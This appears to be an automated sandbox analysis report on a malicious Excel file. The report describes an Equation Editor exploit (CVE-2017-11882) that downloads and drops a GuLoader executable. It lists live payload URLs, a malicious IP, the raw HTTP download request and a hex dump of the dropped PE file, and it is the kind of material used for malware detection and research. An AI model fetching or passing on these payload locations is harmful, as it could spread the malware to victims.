Windows Analysis Report
7027521.xlsx

Overview

General Information

Sample Name:	7027521.xlsx
Analysis ID:	560280
MD5:	e96baf78f2a98321ae47d4d82e608124
SHA1:	e9ea3b397b7c2d5be07845745f621aef0d8d4db0
SHA256:	180125c408724bb6ef0037c028439058d6f0b8326b679e02d7cba8d24461c3bf
Tags:	VelvetSweatshopxlsx
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Binary contains a suspicious time stamp

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection

Found malware configuration

Source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://dariamob.ro/wed/eee_XScUCMEVL47."}

Multi AV Scanner detection for submitted file

Source: 7027521.xlsx	Virustotal: Detection: 48%	Perma Link
Source: 7027521.xlsx	Metadefender: Detection: 23%	Perma Link
Source: 7027521.xlsx	ReversingLabs: Detection: 44%

Antivirus detection for URL or domain

Source: http://50.16.4.125/E/raki.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://50.16.4.125/E/raki.exe

Virustotal: Detection: 9%

Perma Link

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: secur32.pdb source: secur32.dll.4.dr
Source:	Binary string: SxsStore.pdb source: sxsstore.dll.4.dr
Source:	Binary string: secur32.pdbUGP source: secur32.dll.4.dr
Source:	Binary string: SxsStore.pdbGCTL source: sxsstore.dll.4.dr

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406873 FindFirstFileW,FindClose,	4_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 50.16.4.125:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 50.16.4.125:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 60MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://dariamob.ro/wed/eee_XScUCMEVL47.

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AMAZON-AESUS AMAZON-AESUS

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jan 2022 09:40:54 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.14Last-Modified: Wed, 26 Jan 2022 04:12:20 GMTETag: "29888-5d6746870006c"Accept-Ranges: bytesContent-Length: 170120Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 7c 04 03 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 c8 d5 00 00 00 00 00 00 00 00 00 00 f0 83 02 00 98 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 d5 00 00 00 c0 04 00 00 d6 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /E/raki.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 50.16.4.125Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125

Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000004.00000000.464184566.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2864187B.emf

Jump to behavior

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_004056DE

System Summary

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

4_2_0040352D

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040755C	4_2_0040755C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406D85	4_2_00406D85
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73191BFF	4_2_73191BFF

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: raki[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: raki[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: raki[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: 7027521.xlsx	Virustotal: Detection: 48%
Source: 7027521.xlsx	Metadefender: Detection: 23%
Source: 7027521.xlsx	ReversingLabs: Detection: 44%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040352D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$7027521.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE8A9.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.winXLSX@4/24@0/1

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_0040498A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: secur32.pdb source: secur32.dll.4.dr
Source:	Binary string: SxsStore.pdb source: sxsstore.dll.4.dr
Source:	Binary string: secur32.pdbUGP source: secur32.dll.4.dr
Source:	Binary string: SxsStore.pdbGCTL source: sxsstore.dll.4.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_731930C0 push eax; ret

4_2_731930EE

PE file contains sections with non-standard names

Source: secur32.dll.4.dr

Static PE information: section name: .didat

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_73191BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_73191BFF

Binary contains a suspicious time stamp

Source: secur32.dll.4.dr

Static PE information: 0xAEC0B68B [Mon Nov 27 15:00:27 2062 UTC]

Persistence and Installation Behavior

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\sxsstore.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\secur32.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2584

Thread sleep time: -300000s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\Public\vbc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sxsstore.dll

Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406873 FindFirstFileW,FindClose,	4_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node

Source: vbc.exe, 00000004.00000002.680174022.00000000005CF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_73191BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_73191BFF

HIPS / PFW / Operating System Protection Evasion

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040352D

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
50.16.4.125	unknown	United States		14618	AMAZON-AESUS	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://50.16.4.125/E/raki.exe	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://dariamob.ro/wed/eee_XScUCMEVL47.	true	Avira URL Cloud: safe	unknown

AV Detection

Found malware configuration

Source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://dariamob.ro/wed/eee_XScUCMEVL47."}

Multi AV Scanner detection for submitted file

Source: 7027521.xlsx	Virustotal: Detection: 48%	Perma Link
Source: 7027521.xlsx	Metadefender: Detection: 23%	Perma Link
Source: 7027521.xlsx	ReversingLabs: Detection: 44%

Antivirus detection for URL or domain

Source: http://50.16.4.125/E/raki.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://50.16.4.125/E/raki.exe

Virustotal: Detection: 9%

Perma Link

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: secur32.pdb source: secur32.dll.4.dr
Source:	Binary string: SxsStore.pdb source: sxsstore.dll.4.dr
Source:	Binary string: secur32.pdbUGP source: secur32.dll.4.dr
Source:	Binary string: SxsStore.pdbGCTL source: sxsstore.dll.4.dr

